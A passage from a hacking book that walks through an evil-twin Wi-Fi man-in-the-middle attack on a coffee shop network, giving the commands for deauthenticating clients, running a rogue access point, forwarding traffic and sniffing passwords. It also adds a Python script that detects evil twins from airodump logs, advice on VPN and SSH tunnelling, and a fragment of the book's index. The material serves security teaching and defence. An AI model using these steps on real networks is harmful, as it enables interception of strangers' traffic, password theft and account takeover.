card that supports injection. Eve configured airbase-ng to be an open access point with the same 
name as the coffee shop. The interface attached to this evil software AP we will call mon0. She 
then turned on IP forwarding in her kernel and used iptables to forward all packets coming from 
her access point out another wireless interface, wlan0. She then connected wlan0 to the coffee 
shop's access point. With the IP forwarding set up, she has effectively extended the coffee shop's 
network with her computer. To provide DNS and DHCP, she configured dnsmasq. At this point, any 
client that connects to the evil access point will have all of its packets forwarded back to the 
legitimate access point, so it will receive an IP address and be able to access the Internet normally. 
However, its Internet connection might be a little slower. 

Once she had her network set up it was time to collect more clients. A few clients had 
connected on their own, but Eve wanted them all. She decided to use airdrop-ng, a rule-based 
wireless deauth tool. She configured a rule to allow her laptop to connect to the coffee shop's 
access point. She then configured a rule to allow any wireless client to attach to her evil access 
point. Lastly, she configured a rule to deny any client access to the legitimate coffee shop access 
point. When she started airdrop-ng on interface mon1, it created deauth packets based on the rules 
and kicked everyone off the legitimate AP except for her. It is important to note that normal 
wireless client behavior is to blacklist an access point that has sent the client several deauth 
packets. This behavior helps an attacker with a rogue AP because it ensures that the client stops 
trying to associate with the legitimate access point and instead uses the attacker's AP. 

Once the real access point has been blacklisted the client will not try to autoconnect to it 
and will search for another access point of the same name. In this case it happens to be Eve's evil 
access point. Eve leaves airdrop-ng running in the background to control the wireless clients and 
continue to ensure they can only connect to her access point. The last step Eve takes is to start 
ettercap, an MITM tool mostly used for ARP spoofing MITM attacks, but that also has some very 
good password parsing. She sets it up to sniff all the traffic from the clients and, as clients connect 
and access items on the Internet, the passwords simply show up in ettercap's logs. Once Eve finds 
Bob's password, she simply logs into his account and changes the password. Bob is none the wiser 
to the ongoing attack as the network continues to look perfectly normal to him. 

Now that we have a high-level view of Eve's attack on Bob, let's walk through and set up the 
attack ourselves. Note that to perform some of these attacks you must be familiar with Linux and 
have a Linux computer and at least two wireless cards that support monitor mode and injection. 
A third card can be used to connect back to the real access point, but any sort of wide area network 
(WAN) connection will suffice, such as a cell card or an Ethernet connection. You will also need 
the aircrack-ng suite of tools and all of its required dependencies. 

To perform the MITM attack described above, as performed by Eve, you need three wireless 
cards with at least two of them capable of injection. Here we can see three cards: wlan0, wlan1, 
and wlan2. Cards wlan1 and wlan2 have wireless chipsets capable of injection. 

[Terminal screenshot: interface listing showing wlan0, wlan1 and wlan2.] 

Then you need to place the two cards capable of injection into monitor mode. In the case of 
this text I used the aircrack-ng airmon-ng script. The commands to do this are 

airmon-ng start wlan1 
airmon-ng start wlan2 

This creates two new interfaces, mon0 and mon1. Interface mon0 is the monitor interface for 
wlan1 and interface mon1 is the monitor interface for wlan2. 

[Terminal screenshot: airmon-ng output showing the mon0 and mon1 interfaces.] 

Wireless Hacking   385 

Next, we need to find the target client and its association to an access point so we know which 
AP to attack. We can do this using airodump-ng: airodump-ng -w MITM mon1. A quick explanation 
of the flags used on the airodump-ng command: "-w name" allows the user to specify the name 
of the file that airodump-ng writes its logs to. We will need the CSV log file for the airdrop-ng tool. 
Opening the log file, we can see that our target, the Brewsters Coffee access point, has a BSSID of 
00:0F:66:8E:6F:CC. We can also see an attached client with a MAC address of 00:18:DE:09:18:F4. 


[Terminal screenshot: airodump-ng output, 2010-10-12 00:25.] 

Once we know the target we can create the airdrop-ng rules to force the client to attach to 
our rogue access point. The first rule allows any client to attach to our rogue access point: 

a/78:44:76:7D:6F:DA|any 

The next rule allows only our internal wireless card, wlan0, to attach to the target access point. 
This is so we can provide the hijacked client Internet access and not require a separate connection 
to the Internet: 

a/00:0F:66:8E:6F:CC|00:22:FA:62:86:80 

The last rule causes all other clients on the target access point, 00:0F:66:8E:6F:CC, to be sent 
deauth/disassociate packets. 

[Terminal screenshot: the airdrop-ng rules file.] 

The next step is to start up airbase-ng and configure it to look like the target access point: 

airbase-ng -c 1 mon0 --essid "Brewsters Coffee" 

A quick explanation of the flags used on the airbase-ng command: -c is the channel to run 
the access point on, and mon0 configures airbase-ng to start the access point on the same 
interface it is monitoring for packets. When running, and before a client connects, airbase-ng 
looks like this: 

[Terminal screenshot: airbase-ng startup output.] 

Then we need to run the following script, which configures our laptop to set up DNS/DHCP 
and forward the traffic back to the real access point. This is done using iptables and packet 
forwarding in the kernel. There are a few key lines in this script you should understand. First we 
need to turn on packet forwarding in the kernel; this allows the attacking computer to act like 
a router: 

echo 1 > /proc/sys/net/ipv4/ip_forward 

The next step is to clear out all settings in iptables with the following commands: 

iptables --flush 
iptables --table nat --flush 
iptables --delete-chain 
iptables --table nat --delete-chain 


After the tables are cleared out, we can configure iptables to forward packets from our rogue access 
point back to the real access point. These commands set up network address translation (NAT) 
between our interfaces: 

iptables -P FORWARD ACCEPT 
iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE 

A quick note on the last command: wlan0 is the interface we want to use as our WAN interface; 
in our case wlan0 is connected back to the access point we are going to spoof with our rogue AP. 

After that, we need to provide an IP address to the at0 interface. This interface will be created 
by airbase-ng when it is run, and it will be used for all clients that connect to our rogue 
access point. Lastly, we need to create a dnsmasq configuration file. The following echo command 
gives dnsmasq the IP address range to use as well as a lease time: 

echo "dhcp-range=192.168.20.50,192.168.20.100,12h" > dnsmasq.conf 

In our case 12 hours is used. The following command starts dnsmasq with the config file we 
created: 

/usr/sbin/dnsmasq -C dnsmasq.conf -i at0 -8 /home/thex1le/dnsmasq.log 

The -C option points dnsmasq at the config file, the -i flag makes it listen on interface at0, and 
the -8 flag creates a log file in our home directory. Note that your directory paths may vary. 


[Terminal screenshot: dnsmasq starting with dnsmasq.conf and DHCP on at0.] 

Finally, we start airdrop-ng using 

airdrop-ng -i mon1 -r rule.txt -t /home/thex1le/MITM-01.csv 

This will force the client to connect to our rogue access point and give us control of all of their 
traffic. The airdrop-ng flags are as follows: -i is the interface with which to inject packets, -r is the 
text file from which to read the deauth rules, and -t is the airodump-ng CSV file that airdrop-ng 
parses to determine what packets to generate. 

[Terminal screenshot: airdrop-ng running.] 
After 30 to 60 seconds, if we performed the MITM attack correctly, we should see our target 
client now attached to our rogue access point. 

[Terminal screenshot: airodump-ng output after the attack.] 

As we can see in the previous screenshot, the target client with a MAC of 00:18:DE:09:18:F4 is 
now attached to our rogue access point, BSSID 78:44:76:7D:6F:DA. We can also see wlan0, with 
a MAC of 00:22:FA:62:86:80, connected to the real access point, BSSID 00:0F:66:8E:6F:CC. At 
this point it should be abundantly clear just how easy and dangerous MITM attacks are. Now 
that all traffic is routed through the attacker's PC, anything can be done with it. We can sniff 
passwords, change text on web pages, or redirect DNS entries. The only limit to what you can do 
is your imagination. 
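The same airodump-ng CSV that airdrop-ng consumes is also what a defender would look at to catch this setup, since the rogue AP shows up as a second BSSID advertising "Brewsters Coffee" with no encryption. This added example (not code from the book) parses that CSV layout and reports such same-name, weaker-security twins together with the clients attached to them. The rows are constructed from the addresses used in this section, and the `parse_airodump_csv` and `find_evil_twins` names are mine.

```python
"""Find an evil twin in an airodump-ng CSV log: the same ESSID advertised by
a second BSSID with weaker security (the chapter's open rogue AP beside the
real WPA2 one), together with the clients that have attached to it.
Added example, not code from the book. Column order follows the CSV that
`airodump-ng -w` writes; the sample rows are constructed."""
import csv
from collections import defaultdict

SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:0F:66:8E:6F:CC, 2010-10-12 00:20:01, 2010-10-12 00:25:31,  1,  54, WPA2, CCMP, PSK, -45,  120,  0,   0.  0.  0.  0,  16, Brewsters Coffee,
78:44:76:7D:6F:DA, 2010-10-12 00:24:10, 2010-10-12 00:25:31,  1,  54, OPN,  ,  , -20,  60,  0,   0.  0.  0.  0,  16, Brewsters Coffee,
00:11:22:33:44:55, 2010-10-12 00:20:01, 2010-10-12 00:25:31,  6,  54, WPA2, CCMP, PSK, -70,  110,  0,   0.  0.  0.  0,  8, HomeNet1,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:18:DE:09:18:F4, 2010-10-12 00:20:05, 2010-10-12 00:25:30, -50,  300, 78:44:76:7D:6F:DA, Brewsters Coffee
00:22:FA:62:86:80, 2010-10-12 00:20:05, 2010-10-12 00:25:30, -40,  150, 00:0F:66:8E:6F:CC,
"""


def parse_airodump_csv(text):
    """Split the log into its access point and station sections."""
    aps, stations, section = {}, [], None
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = [f.strip() for f in next(csv.reader([line]))]
        if fields[0] == "BSSID":
            section = "ap"
        elif fields[0] == "Station MAC":
            section = "sta"
        elif section == "ap" and len(fields) >= 14:
            aps[fields[0]] = {"bssid": fields[0], "channel": fields[3],
                              "privacy": fields[5], "power": int(fields[8]),
                              "essid": fields[13]}
        elif section == "sta" and len(fields) >= 6:
            stations.append({"mac": fields[0], "bssid": fields[5],
                             "probed": [p for p in fields[6:] if p]})
    return aps, stations


def find_evil_twins(aps, stations):
    """One alert per BSSID that shares an ESSID with a better-secured AP.
    Several BSSIDs with identical security may simply be a real ESS."""
    by_essid = defaultdict(list)
    for ap in aps.values():
        if ap["essid"]:
            by_essid[ap["essid"]].append(ap)
    rank = {"OPN": 0, "WEP": 1}          # anything else (WPA/WPA2) ranks 2
    alerts = []
    for essid, group in by_essid.items():
        best = max(rank.get(ap["privacy"], 2) for ap in group)
        for ap in group:
            if len(group) > 1 and rank.get(ap["privacy"], 2) < best:
                alerts.append({
                    "essid": essid, "suspect": ap["bssid"],
                    "privacy": ap["privacy"], "power": ap["power"],
                    "peers": [o["bssid"] for o in group if o is not ap],
                    "clients": [s["mac"] for s in stations
                                if s["bssid"] == ap["bssid"]]})
    return alerts
```

The "power" field in the alert is the stronger-signal clue from the evil twin discussion: a same-name AP that is louder than the one the site operator installed deserves a look.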


Summary 


As we can see from the different things we discussed in this chapter, not only can computer 
systems be affected by using Wi-Fi, but any other device can be targeted and exploited just as 
easily. From the examples discussed in this chapter, we can see how some of the captured traffic 
can provide very useful and possibly vital information to the potential hacker. For example, some 
of the seemingly useless information can be used to craft spear phishing emails aimed at a specific 
target. If the hacker learns that a particular software package is used, then a simple email crafted 
with an exploit could be sent to that user. Another possibility is that the hacker could search for 
recent exploits for that software or app. 

Depending on the types of protocols and applications used, it may be necessary to figure out 
how a particular application communicates to fully understand the data. In this chapter we have 
been conducting the analysis with the network protocol analyzer Wireshark. Although it’s a great 
application for conducting this type of analysis, it's recommended that other tools are tried also. 
Very often different utilities will be able to identify information or files that other applications may 
have missed. There are both free and commercial software applications available. Some other free 
utilities worth trying are Network Miner and Netwitness. 

Also, it's always very important to stay conscious of what network you're communicating 
on and who may be watching. High-power directional antennas can make it possible to sniff Wi-Fi 
traffic from a great distance. Fortunately, there are a couple of things that can be done to make it 
a little harder for the hacker, although they are not necessarily "mom compatible." By that I mean, 
would I be able to get my mom to do this successfully? Probably not, but then again, this book 
isn't designed for moms either. The primary technique I like to use is tunneling with either a 
virtual private network (VPN) or secure shell (SSH). A VPN solution may have an associated cost. 
The SSH solution can be done entirely with free software. SSH can be used in primarily two 
different ways. First, create an SSH tunnel to a known network and tunnel your browser traffic 
through the tunnel. This has the advantage of being fast, but the DNS and other requests will 
still be sent outside the tunnel, meaning the hacker can see where you're going, just not what you're 
seeing. Second, use the SSH tunnel and forward port 3389 (terminal services) to make a terminal 
services connection to a known system on the known network and use that system's browser and 
apps. This has the advantage of being more secure since all network traffic is happening from the 
remote system. The downside could be the speed and responsiveness since terminal services will 
have to refresh the screen. This setup is outside the scope of this chapter, but you could get started 
by looking at www.no-ip.com (preferred over www.dyndns.org since it doesn't encapsulate the 
traffic with extra HTML), freeSSHd, and PuTTY. 
Versions, identifying, 224 
Video Download Helper, 164–166 
Virtual machine (VM), 96–99, 230, 253 
Virtual private network (VPN), 126–128, 183 
VM, see Virtual machine 
VPN, see Virtual private network 
WebDAV DLL hijacker, 283–287 
Web proxies, 121, 122 
WEP, see Wired equivalent privacy 
whoami, 26, 279 
Wi-Fi 
  device identification, 370–371 
  hardware, 360–361 
  monitoring and capturing, 366–370 
  network analysis 
    data-text-lines, 373–374 
    Export Selected Bytes, 375 
    Google, 377 
    iPhone Twitter app, 377–379 
    TCP Stream, 376 
    TweetDeck, 379 
    WireShark protocol, 373–375 
  software, 360–361 
Wifi hex, 83 
Wi-Fi protected access (WPA), 205 
Wi-Fi protected access pre-shared key (WPA-PSK) 
  cracking, 362–366 
  rainbow tables, 371–373 
Windows attack machine, installing Metasploit on, 282 
Windows binary executables, 211 
Windows fdisk program, 105 
WindowsGate utility, 26–29 
Windows hibernation file, 345 
Windows operating system 
  defending against physical attacks on, 31–32 
    BitLocker hacks, 33–39 
    drive partitioning for BitLocker, 32–33 
    Evil Maid program, 43–45 
    TPM, 33–39 
    TrueCrypt, 39–42 
  log in without knowing the password, 21–24 
    Bart's PE, 26–29 
    using Kon-Boot, 24–26 
    WindowsGate utility, 26–29 
  physical access 
    Live CDs, 3–6 
    before you start, 6–8 
  Windows 2000 server family domain controllers, 30–31 
Windows signatures, 211 
Wine, 231–232 
Winrar, 157, 160–162 
wins.fun, 257 
Wired equivalent privacy (WEP), 205, 365–366, 367 
Wireshark 
  filtering data in, 215 
  operators, 216 
  setting up, 214 
WorldIP Firefox plug-in, 129 
WPA-PSK, see Wi-Fi protected access pre-shared key 